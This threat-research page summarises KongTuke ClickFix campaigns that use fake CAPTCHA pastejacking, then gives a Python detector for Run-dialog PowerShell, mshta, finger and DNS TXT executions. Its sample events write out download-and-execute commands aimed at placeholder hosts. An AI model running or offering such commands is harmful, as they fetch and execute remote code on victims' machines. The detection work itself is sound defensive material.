Threat Research

    Security researchers uncovered ongoing attacks linked to the KongTuke threat group using compromised WordPress sites and fake CAPTCHA lures to spread the Python-based modeloRAT. Attackers inject malicious JavaScript that prompts users to run a PowerShell command, triggering a multistage infection process....
    ClickFix-based campaigns rotate the commands they place in the victim's clipboard. In late December 2025, the KongTuke campaign incorporated DNS TXT records into its ClickFix command text. These campaigns regularly shift between ClickFix techniques, including the finger protocol and mshta....
    We've discovered a new, resilient variant of the Interlock ransomware group's remote access trojan (RAT), previously tracked as NodeSnake when it was written in JavaScript and now rewritten in PHP. This version has been actively used in a widespread campaign linked to the LandUpdate808 (aka KongTuke) threat clusters since May 2025....
    The attack chain begins with a malicious script injected into legitimate but compromised websites. This script redirects users to a fake CAPTCHA page designed to mimic a "verify you are human" check. The deceptive CAPTCHA page performs clipboard hijacking—also known as pastejacking—by injecting malicious code into the user's clipboard....
    KongTuke is identified by an injected script that causes compromised websites to display fake "verify you are human" pages. These pages load a malicious PowerShell script into the victim's Windows clipboard and give step-by-step instructions urging the victim to paste and execute it in a Run window. This tactic is part of the campaign commonly tracked as #KongTuke....
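    The entries above describe the same execution pattern from the defender's side: a user pastes a clipboard-loaded command into the Run dialog, and the resulting process uses PowerShell download-and-execute, mshta with a remote URL, the finger protocol, or a DNS TXT lookup to fetch the next stage. The following is an added detection example written for this page, not code from the original posts or from any vendor named in them. It scores constructed Sysmon-style process-creation events (parent image, image, command line) against those four techniques and flags hits whose parent is an interactive launch point. The field names, the sample events and the assumption that a Run-dialog launch shows explorer.exe as the parent are the example's own.

```python
"""Flag ClickFix-style "paste this into Run" executions in process-creation telemetry.

Added example, not code from the original page. Assumptions (not from the page):
the event fields, the sample events below, and the rule that a Win+R Run dialog
launch appears with explorer.exe as the parent process.
"""
from __future__ import annotations

import ntpath
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


# Parents that host an interactive "paste and run" entry point. Assumption:
# the Run dialog is hosted by explorer.exe; a console or terminal paste shows
# cmd.exe / WindowsTerminal.exe instead.
INTERACTIVE_PARENTS = {"explorer.exe", "cmd.exe", "windowsterminal.exe"}

# (technique label, image basenames the rule applies to or None for any, command-line regex)
RULES = [
    ("powershell_download_exec",
     {"powershell.exe", "pwsh.exe"},
     re.compile(r"(?i)\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b")),
    ("mshta_remote",
     {"mshta.exe"},
     re.compile(r"(?i)https?://")),
    ("finger_protocol",
     None,
     re.compile(r"(?i)\bfinger(\.exe)?\s+\S+@\S+")),
    ("dns_txt_lookup",
     None,
     re.compile(r"(?i)(nslookup\b.*-(q|qt|type|querytype)=txt|resolve-dnsname\b.*-type\s+txt\b)")),
]


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path; ntpath works on any host OS."""
    return ntpath.basename(path).lower()


def classify(event: ProcEvent) -> list[str]:
    """Return the sorted technique labels whose rules match the event."""
    image = basename(event.image)
    labels = []
    for label, images, pattern in RULES:
        if images is not None and image not in images:
            continue
        if pattern.search(event.command_line):
            labels.append(label)
    return sorted(labels)


def is_clickfix_candidate(event: ProcEvent) -> bool:
    """A technique hit launched from an interactive parent is what a ClickFix
    paste looks like. The same command under services.exe or a scheduled task
    still deserves a look, but it is not this pattern."""
    return bool(classify(event)) and basename(event.parent_image) in INTERACTIVE_PARENTS


def scan(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Return (index, labels) for every candidate event in order."""
    return [(i, classify(e)) for i, e in enumerate(events) if is_clickfix_candidate(e)]


# Constructed sample telemetry; not captured from any real incident.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell -w hidden -c \"iex (iwr 'https://example.invalid/x')\""),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
              "mshta https://example.invalid/a.hta"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\cmd.exe",
              "cmd /c finger admin@example.invalid | more +2 | cmd"),
    ProcEvent(r"C:\Windows\explorer.exe", PS,
              "powershell -w h -c \"$t=(Resolve-DnsName -Type TXT example.invalid).Strings; iex $t\""),
    ProcEvent(r"C:\Windows\System32\services.exe", PS,
              r"powershell -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
              "notepad.exe readme.txt"),
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\nslookup.exe",
              "nslookup -type=TXT example.invalid"),
]

if __name__ == "__main__":
    for idx, labels in scan(SAMPLE_EVENTS):
        print(f"event {idx}: {', '.join(labels)}")
```

    The parent-process filter is what keeps this from paging on every administrative PowerShell job: the last sample event (nslookup TXT under svchost.exe) matches the DNS TXT rule but is not reported, while the four explorer.exe launches are. In production you would widen INTERACTIVE_PARENTS to whatever hosts the Run dialog and terminals in your environment, and treat the technique labels as tuning inputs rather than the page's exact indicators.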